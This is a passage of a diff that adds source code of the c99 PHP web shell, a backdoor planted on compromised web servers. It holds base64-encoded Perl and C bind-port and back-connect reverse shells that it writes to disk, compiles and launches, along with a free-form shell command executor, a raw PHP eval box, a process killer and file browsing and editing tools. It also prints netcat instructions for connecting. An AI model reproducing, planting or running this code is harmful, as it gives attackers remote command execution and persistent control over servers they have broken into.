+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size(filesize($v));
+    }
+    $row[] = date("d.m.Y H:i:s",filemtime($v));
+     
+    if (!$win)
+    {
+     $ow = @posix_getpwuid(fileowner($v));
+     $gr = @posix_getgrgid(filegroup($v));
+     $row[] = $ow["name"]."/".$gr["name"];
+    }
+         
+    if (is_writable($v)) {$row[] = "<font color=\"green\">".view_perms(fileperms($v))."</font>";}
+    else {$row[] = "<font color=\"red\">".view_perms(fileperms($v))."</font>";}
+
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" title=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";}
+
+    if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}
+    elseif (is_link($v)) {$tab[links][] = $row;}
+    elseif (is_dir($v)) {$tab[dirs][] = $row;}
+    elseif (is_file($v)) {$tab[files][] = $row;}
+   }   
+  }
+  $v = $sort[0];
+  function tabsort($a, $b)
+  {
+   global $v;
+   return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v]));
+  }
+  usort($tab[dirs], "tabsort");
+  usort($tab[files], "tabsort");
+  if ($sort[1] == "a")
+  {
+   $tab[dirs] = array_reverse($tab[dirs]);
+   $tab[files] = array_reverse($tab[files]);
+  }
+  //Compiling table
+  $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]);
+  echo "<b>Listing directory (".count($tab[files])." files and ".(count($tab[dirs])+count($tab[links]))." directories):</b><br><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0><form method=\"POST\">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\"><b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=\"act\"><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">Delete</option>";
+  echo "<option value=\"archive\"".gchds($dspact,"archive"," selected").">Archive</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">Cut</option>";
+   echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">Copy</option>";
+   echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+if ($act == "bind")
+{
+ $bndsrcs = array(
+"c99sh_bindport.pl"=>
+"IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW".
+"WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI".
+"TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS".
+"RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp".
+"bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph".
+"Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl".
+"biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy".
+"XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K".
+"ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K".
+"ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9",
+
+"c99sh_bindport.c"=>
+"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5".
+"cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N".
+"CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy".
+"ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1".
+"Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f".
+"ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p".
+"KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm".
+"ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi".
+"c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl".
+"LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h".
+"Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN".
+"CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy".
+"ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp".
+"DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN".
+"CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K".
+"ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg".
+"aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g".
+"J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy".
+"ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K".
+"fQ==",
+
+"c99sh_backconn.pl"=>
+"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ".
+"HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ".
+"DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ".
+"HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L".
+"CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd".
+"GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka".
+"WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO".
+"iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR".
+"VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK".
+"FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==",
+
+"c99sh_backconn.c"=>
+"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l".
+"dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk".
+"Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk".
+"YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g".
+"aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh".
+"cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy".
+"XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg".
+"DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1".
+"Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0".
+"KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo".
+"ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi".
+"c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="
+);
+
+ $bndportsrcs = array(
+"c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
+"c99sh_bindport.c"=>array("Using C","%path %port %pass")
+);
+
+ $bcsrcs = array(
+"c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
+"c99sh_backconn.c"=>array("Using C","%path %host %port")
+);
+
+ if ($win) {echo "<b>Binding port and Back connect:</b><br>This functions not work in Windows!<br><br>";}
+ else
+ {
+  if (!is_array($bind)) {$bind = array();}
+  if (!is_array($bc)) {$bc = array();}
+  if (!is_numeric($bind[port])) {$bind[port] = $bindport_port;}
+  if (empty($bind[pass])) {$bind[pass] = $bindport_pass;}
+  if (empty($bc[host])) {$bc[host] = $REMOTE_ADDR;}
+  if (!is_numeric($bc[port])) {$bc[port] = $bindport_port;}
+  if (!empty($bindsubmit))
+  {
+   echo "<b>Result of binding port:</b><br>";
+   $v = $bndportsrcs[$bind[src]];
+   if (empty($v)) {echo "Unknown file!<br>";}
+   elseif (fsockopen($SERVER_ADDR,$bind[port],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+   else
+   {
+    $srcpath = $tmpdir.$bind[src];
+    $w = explode(".",$bind[src]);
+    $ext = $w[count($w)-1];
+    unset($w[count($w)-1]);
+    $binpath = $tmpdir.join(".",$w);
+    if ($ext == "pl") {$binpath = $srcpath;}
+    @unlink($srcpath);
+    $fp = fopen($srcpath,"ab+");
+    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+    else
+    {
+     $data = base64_decode($bndsrcs[$bind[src]]);
+     fwrite($fp,$data,strlen($data));
+     fclose($fp);
+
+     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
+
+     $v[1] = str_replace("%path",$binpath,$v[1]);
+     $v[1] = str_replace("%port",$bind[port],$v[1]);
+     $v[1] = str_replace("%pass",$bind[pass],$v[1]);
+     $v[1] = str_replace("//","/",$v[1]);
+     $retbind = myshellexec($v[1]." > /dev/null &");
+     sleep(5); //Timeout
+     $sock = fsockopen("localhost",$bind[port],$errno,$errstr,5);
+     if (!$sock) {echo "I can't connect to localhost:".$bind[port]."! I think you should configure your firewall.";}
+     else {echo "Binding... ok! Connect to <b>".$SERVER_ADDR.":".$bind[port]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".$SERVER_ADDR." ".$bind[port]."</b>\"!<center><a href=\"".$surl."act=ps_aux&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
+    }
+    echo "<br>";
+   }
+  }
+  if (!empty($bcsubmit))
+  {
+   echo "<b>Result of back connection:</b><br>";
+   $v = $bcsrcs[$bc[src]];
+   if (empty($v)) {echo "Unknown file!<br>";}
+   else
+   {
+    $srcpath = $tmpdir.$bc[src];
+    $w = explode(".",$bc[src]);
+    $ext = $w[count($w)-1];
+    unset($w[count($w)-1]);
+    $binpath = $tmpdir.join(".",$w);
+    if ($ext == "pl") {$binpath = $srcpath;}
+    @unlink($srcpath);
+    $fp = fopen($srcpath,"ab+");
+    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+    else
+    {
+     $data = base64_decode($bndsrcs[$bind[src]]);
+     fwrite($fp,$data,strlen($data));
+     fclose($fp);
+     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+     $v[1] = str_replace("%path",$binpath,$v[1]);
+     $v[1] = str_replace("%host",$bc[host],$v[1]);
+     $v[1] = str_replace("%port",$bc[port],$v[1]);
+     $v[1] = str_replace("//","/",$v[1]);
+     $retbind = myshellexec($v[1]." > /dev/null &");
+     echo "Now script try connect to ".$bc[host].":".$bc[port]."...<br>";
+    }
+   }
+  }
+  ?><b>Binding port:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<? echo $d; ?>">Port: <input type="text" name="bind[port]" value="<?php echo htmlspecialchars($bind[port]); ?>">&nbsp;Password: <input type="text" name="bind[pass]" value="<?php echo htmlspecialchars($bind[pass]); ?>">&nbsp;<select name="bind[src]"><?php
+foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind[src]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type="submit" name="bindsubmit" value="Bind"></form>
+<b>Back connection:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<? echo $d; ?>">HOST: <input type="text" name="bc[host]" value="<?php echo htmlspecialchars($bc[host]); ?>">&nbsp;Port: <input type="text" name="bc[port]" value="<?php echo htmlspecialchars($bc[port]); ?>">&nbsp;<select name="bc[src]"><?php
+foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc[src]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type="submit" name="bcsubmit" value="Connect"></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p &lt;port&gt;</b>"!<?php
+ }
+}
+if ($act == "cmd")
+{
+ if (!empty($submit))
+ {
+  echo "<b>Result of execution this command</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   myshellexec($cmd);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($cmd_txt)
+   {
+    $rows = count(explode("
+",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret;}
+  }
+  else
+  {
+   if ($cmd_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    myshellexec($cmd);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>";  if (empty($cmd_txt)) {$cmd_txt = true;}}
+ echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "ps_aux")
+{
+ echo "<b>Processes:</b><br>";
+ if ($win) {echo "This function not work in Windows!<br><br>";}
+ else
+ {
+  if ($pid)
+  {
+   if (!$sig) {$sig = 9;}
+   echo "Sending signal ".$sig." to #".$pid."... ";
+   $ret = posix_kill($pid,$sig);
+   if ($ret) {echo "ok. he is dead, amen.";}
+   else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "Can't execute \"ps -aux\"!";}
+  else
+  {
+   $ret = htmlspecialchars($ret);
+   $ret = str_replace("	"," ",$ret);
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $prcs = explode("\n",$ret);
+   $head = explode(" ",$prcs[0]);
+   $head[] = "ACTION";
+   unset($prcs[0]);
+   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+   echo "<tr border=\"1\">";
+   foreach ($head as $v) {echo "<td><b>&nbsp;&nbsp;&nbsp;".$v."</b>&nbsp;&nbsp;&nbsp;</td>";}
+   echo "</tr>";
+   foreach ($prcs as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10,count($line)));
+     $line = array_slice($line,0,11);
+     $line[] = "<a href=\"".$surl."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     foreach ($line as $v) {echo "<td>&nbsp;&nbsp;&nbsp;".$v."&nbsp;&nbsp;&nbsp;</td>";}
+     echo "</tr>";
+    }
+   }
+   echo "</table>";
+  }
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("
+",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret;}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
+ echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ $r = @file_get_contents($d.$f);
+ if (!is_readable($d.$f) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v)
+  {
+   if (in_array($ext,$v)) {$rft = $k; break;}
+  }
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+array("Code","code"),
+array("Session","phpsess"),
+array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+array("SDB","sdb"),
+array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+);
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  if (is_writable($d.$f)) {echo "<font color=\"green\">full read/write access (".view_perms(fileperms($d.$f)).")</font>";}
+  else {echo "<font color=\"red\">Read-Only (".view_perms(fileperms($d.$f)).")</font>";}
+  echo "</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=\"green\">".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else
+   {
+    echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";
+   }
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b>";
+   echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
+   echo "<tr class=tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr>";
+   echo "<tr class=tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr class=tr><td><b>Owner/Group</b></td><td> ";      
+    $tmp=posix_getpwuid(fileowner($d.$f));
+    if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+    else echo $tmp['name']." ";
+    $tmp=posix_getgrgid(filegroup($d.$f));
+    if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+    else echo $tmp['name'];
+   }
+   echo "<tr class=tr><td><b>Perms</b></td><td>";
+   
+   if (is_writable($d.$f))
+   {
+    echo "<font color=\"green\">".view_perms(fileperms($d.$f))."</font>";
+   }
+   else
+   {
+    echo "<font>".view_perms(fileperms($d.$f))."</font>";
+   }
+
+   echo "</td></tr>";
+   echo "<tr class=tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
+   echo "</table><br>";
+
+
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump)
+    {
+     echo "<b>FULL HEXDUMP</b>";
+     $str=fread($fi,filesize($d.$f));
+    }
+    else
+    {
+     echo "<b>HEXDUMP PREVIEW</b>";
+     $str=fread($fi,$hexdump_lines*$hexdump_rows);
+    }
+    $n=0;
+    $a0="00000000<br>";
+    $a1="";
+    $a2="";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1.=sprintf("%02X",ord($str[$i])).' ';
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2.="<font class=s2>0</font>"; break;
+      case 32: 
+      case 10:
+      case 13: $a2.="&nbsp;"; break;
+      default:  $a2.=htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1<strlen($str)) {$a0.=sprintf("%08X",$i+1)."<br>";}
+      $a1.="<br>";
+      $a2.="<br>";
+     }
+    }
+    //if ($a1!="") {$a0.=sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4 ".
+         "class=sy><tr><td bgcolor=#666666> $a0</td><td bgcolor=000000>".
+         "$a1</td><td bgcolor=000000>$a2</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode($r);
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode($r));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode($r);
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+   <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+   <P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {exit;}
+  }
+  elseif ($ft == "txt")
+  {
+   echo "<pre>".htmlspecialchars($r)."</pre>";
+  }
+  elseif ($ft == "ini")
+  {
+   echo "<pre>";
+   var_dump(parse_ini_file($d.$f,true));
+   echo "</pre>";
+  }
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"".htmlspecialchars($r)."\"><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;<input type=\"submit\" value=\"View&Edit command\"></form>";
+  }
